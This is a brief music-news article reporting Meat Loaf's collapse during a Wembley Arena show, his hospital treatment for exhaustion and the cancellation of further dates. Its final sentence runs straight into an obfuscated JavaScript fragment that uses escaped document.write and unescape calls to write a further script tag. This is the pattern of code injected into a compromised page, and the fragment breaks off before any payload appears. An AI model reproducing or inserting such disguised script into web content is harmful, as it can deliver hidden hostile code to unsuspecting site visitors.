18-stone heavy weight of MOR Rock, Meat Loaf, collapsed on stage in London last night.
Meat Loaf, playing Wembley Arena, fell whilst singing ‘All Revved Up' and had to be helped from the stage by members of the band, road crew, emergency services, seven body guards and an amateur football eleven who luckily were seated in row A.
After collapsing Meat, 57, took to the stage again to sing ‘I Would Do Anything For Love' but had to stop the show shortly afterwards.
Tonight's show at Wembley has also been cancelled and this comes after dates in Manchester and Cardiff were pulled last week due to illness.
Meat Loaf was taken to Northwick Park Hospital in Harrow following the collapse and, according to the North West London Hospitals NHS Trust, is suffering "from exhaustion due to a prolonged viral infection".
He will be revaluated later today, and we at Music News wish him all the very best.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
